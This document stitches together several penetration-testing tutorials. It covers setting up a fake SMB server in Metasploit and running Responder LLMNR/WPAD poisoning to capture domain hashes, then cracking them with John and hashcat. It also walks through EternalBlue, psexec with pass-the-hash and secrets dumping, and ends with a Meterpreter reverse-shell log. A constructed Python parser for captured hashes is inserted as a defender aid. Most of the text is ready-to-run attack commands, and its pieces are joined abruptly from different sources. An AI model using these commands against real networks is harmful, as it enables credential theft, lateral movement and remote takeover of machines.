Creating a Fake SMB Server to Capture Credentials
In a previous tutorial in this Metasploit Basics series, we learned how to use hashdump to pull password hashes from a local machine.
In "Cracking Passwords with Hashcat", you learned how to crack these hashes with hashcat.
In each of these cases, the password hashes were the passwords of the users on the local system and not the domain. If the machine is part of a domain (which is the case in most organizations and large institutions), users will most likely have their password stored on the domain controller (DC). How could we get the domain passwords without attacking the fortified domain controller?
One of the more powerful features built into Metasploit is the ability to set up a fake SMB server. This means that when someone on the network attempts to access the SMB server, their machine will need to present their credentials in the form of their domain password hash. Very often, large networks have a system that systematically connects to each machine to check whether it is patched and secure. When it does so, it must present its credentials to every machine, and this will usually be the admin password. If we are patient, this can be the best method.
In addition, by setting up this fake SMB server we will be able to capture domain credentials as users try to authenticate against it. We can send the target an embedded UNC path, and when they click on it, we are able to grab their domain credentials.
Unlike some of our other Metasploit attacks, this is neither an exploit nor a payload. It is an auxiliary module, and it is capable of capturing the hash in a format that can be cracked using either Cain and Abel, the very capable but slow Windows cracker, or John the Ripper, probably the oldest password cracker still on the market.
Step 1: Fire Up Kali and Start Metasploit
Let's begin by firing up Kali and opening one of my favorite hacking tools, Metasploit, by typing:
kali > msfconsole
When we do, we are greeted by the very familiar Metasploit splash screen.
Step 2: Set Up the SMB Server
Now that we have Metasploit open, let's set up a fake SMB server. Unlike some of our other Metasploit attacks, this one is neither an exploit nor a payload, but rather an auxiliary module. We can start it by entering:
Now that we have loaded this module, let's check the options we need to set to use it.
msf > show options
As you can see, this module has numerous options, but we will leave the default settings on each of them, except for the file type used to save the hashes for cracking.
Note that I have highlighted the JOHNPWFILE option above. We also have the CAINPWFILE at the very top. These options let us choose the format of the file storing the hashes for cracking by Cain and Abel or John the Ripper. In this tutorial, I'll be using the latter tool.
To do so, I simply need to tell this module to "set" the JOHNPWFILE to a particular location by typing:
msf > set JOHNPWFILE /root/domainhashes
Now, all that is left to do is "exploit."
msf > exploit
When we type "exploit," this module will start a fake SMB server that will save the presented credentials in the /root directory in files beginning with "johnhashes".
Step 3: Share
Now that our SMB server is running, we need someone to attempt to log in to our share. We can do this by sending a UNC link to our share, such as:
net use \\192.168.1.106\occupytheweb
When they click on that link, their domain credentials will be presented to our SMB server and captured as in the screenshot below.
Step 4: Crack the Hash
The final step is to crack the hashes to obtain the password. We need to go to the /root directory to find the saved hash files.
kali > cd /root
As you can see, there are hashes saved here. Now to crack them, we can use John the Ripper (it's built into Kali) by typing:
kali > john johnhashes_netlmv2
When we do so, John the Ripper loads the password hash, recognizes the type of hash, and starts cracking it. Depending on the length and complexity of the password, John will take minutes to days to crack the hash, but when it is done you will have the password of the person who clicked on your UNC link and have full run of the computer!
Overview & Tools
In order to complete this project, it is good practice to start Responder in analysis mode with the option -A.
python Responder.py -I eth0 -A
This way we can get an overview of the normal traffic on the network and see if there are any NACs (Network Access Controls). From this point we can easily exclude them by editing Responder.conf and placing their IP under the entry DontRespondTo. Otherwise, if we want to target specific IPs instead, we would have to insert them under the entry RespondTo.
Now we're ready to capture some hashes with the following command:
python Responder.py -I eth0
When a client attempts to resolve a name that is not in the DNS, Responder will poison the LLMNR (Link-Local Multicast Name Resolution) and NBT-NS (NetBIOS Name Service) responses and spoof the SMB request in order to grab the NetNTLMv2 hash.
Once the hash has been obtained, we can proceed to crack it or we can relay it to another machine. I love cracking passwords, so...
To crack the hash, we can use Hashcat, a tool for password recovery. We run:
hashcat -m 5600 hash.txt rockyou.txt;
where -m is used to specify the type of hash that we want to crack, hash.txt is our hash and rockyou.txt is our dictionary.
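As an added example that is not part of the original article or of Responder/Metasploit, the following Python parses one line in the format that hashcat mode 5600 and John's netntlmv2 format expect (USER::DOMAIN:server_challenge:ntproof:blob) and decodes the NTLMv2 blob, so a defender reviewing a capture file can see which account and domain were exposed, which host name the client thought it was talking to, and when. The sample line, the host name FILESRV01 and the challenge values are constructed, not a real capture.

```python
import struct
from datetime import datetime, timedelta, timezone
EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)
# AV_PAIR ids from the NTLMv2 blob (MS-NLMP), used to label what the client recorded.
AV_NAMES = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName", 4: "DnsDomainName",
            5: "DnsTreeName", 6: "Flags", 7: "Timestamp", 9: "TargetName", 10: "ChannelBindings"}

def filetime_to_utc(ticks):
    """Windows FILETIME (100 ns ticks since 1601-01-01) -> aware UTC datetime."""
    return EPOCH_1601 + timedelta(microseconds=ticks // 10)

def utc_to_filetime(dt):
    """Inverse of filetime_to_utc, computed in integers to avoid float rounding."""
    d = dt - EPOCH_1601
    return (d.days * 86400 + d.seconds) * 10_000_000 + d.microseconds * 10

def parse_netntlmv2_line(line):
    """Parse a USER::DOMAIN:server_challenge:ntproof:blob line (hashcat -m 5600 format)."""
    user, _, domain, challenge, ntproof, blob_hex = line.strip().split(":")
    blob = bytes.fromhex(blob_hex)
    if blob[:2] != b"\x01\x01":
        raise ValueError("not an NTLMv2 client challenge blob")
    ts = struct.unpack_from("<Q", blob, 8)[0]   # client timestamp at offset 8
    av, pos = {}, 28                            # AV pairs start after 4 reserved bytes
    while True:
        av_id, av_len = struct.unpack_from("<HH", blob, pos)
        pos += 4
        if av_id == 0:                          # MsvAvEOL terminates the list
            break
        value = blob[pos:pos + av_len]
        pos += av_len
        if av_id in (1, 2, 3, 4, 5, 9):         # UTF-16LE name strings
            value = value.decode("utf-16-le")
        elif av_id == 7:
            value = filetime_to_utc(struct.unpack("<Q", value)[0])
        av[AV_NAMES.get(av_id, str(av_id))] = value
    return {"user": user, "domain": domain, "server_challenge": challenge, "ntproof": ntproof,
            "client_challenge": blob[16:24].hex(), "timestamp": filetime_to_utc(ts), "av_pairs": av}

def _av(av_id, value):
    return struct.pack("<HH", av_id, len(value)) + value

def build_sample_line():
    """Constructed sample, not a real capture: 'alice' of DEMO answered a spoofed host FILESRV01."""
    ts = utc_to_filetime(datetime(2023, 1, 18, 12, 9, 13, tzinfo=timezone.utc))
    av = (_av(1, "FILESRV01".encode("utf-16-le")) + _av(2, "DEMO".encode("utf-16-le"))
          + _av(4, "demo.local".encode("utf-16-le")) + _av(7, struct.pack("<Q", ts)) + _av(0, b""))
    blob = b"\x01\x01" + bytes(6) + struct.pack("<Q", ts) + bytes(range(8)) + bytes(4) + av + bytes(4)
    return "alice::DEMO:" + "11" * 8 + ":" + "22" * 16 + ":" + blob.hex()
```

Run parse_netntlmv2_line over each line of the capture file to list the exposed accounts and the spoofed server names they answered; those are the credentials to rotate.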
We can use the credentials obtained to spawn a shell using psexec (a tool from Impacket) with the command:
python psexec.py 'Jackie Chan':n[email protected]
We can also use Responder for another attack that allows us to poison the WPAD request. In a corporate network a proxy is usually used to reach the Internet. But how does a computer know which proxy to use? To solve this problem, a computer automatically searches for a WPAD (Web Proxy Auto-Discovery) server.
What Responder does with the command python Responder.py -I eth0 -wFr is create a fake WPAD server, so it answers the client with its own IP. Then, when the client tries to fetch wpad.dat, Responder presents an authentication prompt asking the client to enter the username and password used in the domain. The credentials are shown in the terminal in plaintext.
SMB (Server Message Block) is a protocol for sharing files across nodes on a network.
There are two main ports for SMB:
139/TCP – Initially Microsoft implemented SMB on top of their existing NetBIOS network architecture, which allowed Windows computers to communicate across the same network
445/TCP – Newer versions of SMB use this port, where NetBIOS is not used.
Other terminology to be aware of:
SMB – Server Message Block
CIFS – Common Internet File System
Samba – A free software re-implementation of SMB, which is frequently found on Unix-like systems
Metasploit has support for multiple SMB modules, including:
Version enumeration
Verifying/bruteforcing credentials
Capture modules
Relay modules
File transfer
Exploit modules
There are more modules than listed here; for the full list of modules run the search command within msfconsole:
msf6 > search smb
Lab Environment
When testing in a lab environment, SMB can be used on a Windows host machine, or within Docker.
For example, running Samba on Ubuntu 16.04:
docker run -it --rm --publish 127.0.0.1:139:139 --publish 127.0.0.1:445:445 ubuntu:16.04 /bin/bash
mkdir -p /tmp/foo
apt update
apt install -y samba
Verifying the version is as expected:
$ samba --version
Version 4.3.11-Ubuntu
Configuring the share:
cat << EOF >> /etc/samba/smb.conf
[foo_share]
comment = Foo samba share
path = /tmp/foo
read only = no
browsable = yes
EOF
Restart the service:
service smbd restart
SMB Enumeration
Enumerate SMB version:
use auxiliary/scanner/smb/smb_version
run smb://10.10.10.161
Enumerate shares:
use auxiliary/scanner/smb/smb_enumshares
run smb://10.10.10.161
run smb://user:[email protected]
run 'smb://domain;user with spaces:[email protected]' SMB::AlwaysEncrypt=false SMB::ProtocolVersion=1
Enumerate shares and show all files recursively:
use auxiliary/scanner/smb/smb_enumshares
run 'smb://user:pass with a sp[email protected]' showfiles=true spidershares=true
Enumerate users:
use auxiliary/scanner/smb/smb_enumusers
run smb://user:[email protected]
Enumerate GPP files in an SMB share:
use auxiliary/scanner/smb/smb_enum_gpp
run smb://192.168.123.13/share_name verbose=true store=true
run smb://user:p[email protected]/share_name verbose=true store=true
SMB Server
Create a mock SMB server which accepts credentials before returning NT_STATUS_LOGON_FAILURE. These hashes can then be cracked later:
use auxiliary/server/seize/smb
run
SMB MS17-010
Metasploit has a module for MS17-010, dubbed EternalBlue, which has the capability to target Windows 7, Windows 8.1, Windows 2012 R2, and Windows 10.
Checking for exploitability:
use auxiliary/scanner/smb/smb_ms17_010
check 10.10.10.23
check 10.10.10.0/24
check smb://user:[email protected]/
check smb://domain;user:[email protected]/
check cidr:/24:smb://user:[email protected] threads=32
As of 2021, Metasploit supports a single exploit module for MS17-010, which has the capability to target Windows 7, Windows 8.1, Windows 2012 R2, and Windows 10; full details are in the Metasploit Wrapup:
use exploit/windows/smb/ms17_010_eternalblue
run 10.10.10.23 lhost=192.168.123.1
run 10.10.10.0/24 lhost=192.168.123.1 lport=5000
run smb://user:[email protected]/ lhost=192.168.123.1
run smb://domain;user:[email protected]/ lhost=192.168.123.1
SMB psexec
Running psexec against a remote host with credentials:
use exploit/windows/smb/psexec
run smb://user:[email protected] lhost=192.168.123.1 lport=5000
Running psexec with NTLM hashes:
use exploit/windows/smb/psexec
run smb://Administrator:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb[email protected] lhost=10.10.14.13 lport=5000
SMB Dumping
Dumping secrets with credentials:
use auxiliary/gather/windows_secrets_dump
run smb://user:[email protected]
Dumping secrets with NTLM hashes:
use auxiliary/gather/windows_secrets_dump
run smb://Administrator:aad3b435b51404eeaad3b435b51404ee:[email protected]
SMB Files
Download a file:
use auxiliary/admin/smb/download_file
run smb://a:[email protected]/my_share/helloworld.txt
Upload a file:
use auxiliary/admin/smb/upload_file
echo "my file" > local_file.txt
run smb://a:p4$$w0r[email protected]/my_share/remote_file.txt lpath=./local_file.txt
Kerberos Authentication
Details on the Kerberos-specific option names are documented in Kerberos Service Authentication.
Running psexec against a host:
msf6 > use exploit/windows/smb/psexec
msf6 exploit(windows/smb/psexec) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd smb::auth=kerberos domaincontrollerrhost=192.168.123.13 smb::rhostname=dc3.demo.local domain=demo.local
[*] Started reverse TCP handler on 192.168.123.1:4444
[*] 192.168.123.13:445 - Connecting to the server...
[*] 192.168.123.13:445 - Authenticating to 192.168.123.13:445|demo.local as user 'Administrator'...
[+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid TGT-Response
[*] 192.168.123.13:445 - 192.168.123.13:445 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120911_default_192.168.123.13_mit.kerberos.cca_474531.bin
[+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid TGS-Response
[*] 192.168.123.13:445 - 192.168.123.13:445 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120911_default_192.168.123.13_mit.kerberos.cca_169149.bin
[+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid delegation TGS-Response
[*] 192.168.123.13:445 - Selecting PowerShell target
[*] 192.168.123.13:445 - Executing the payload...
[+] 192.168.123.13:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175686 bytes) to 192.168.123.13
[*] Meterpreter session 6 opened (192.168.123.1:4444 -> 192.168.123.13:49738) at 2023-01-18 12:09:13 +0000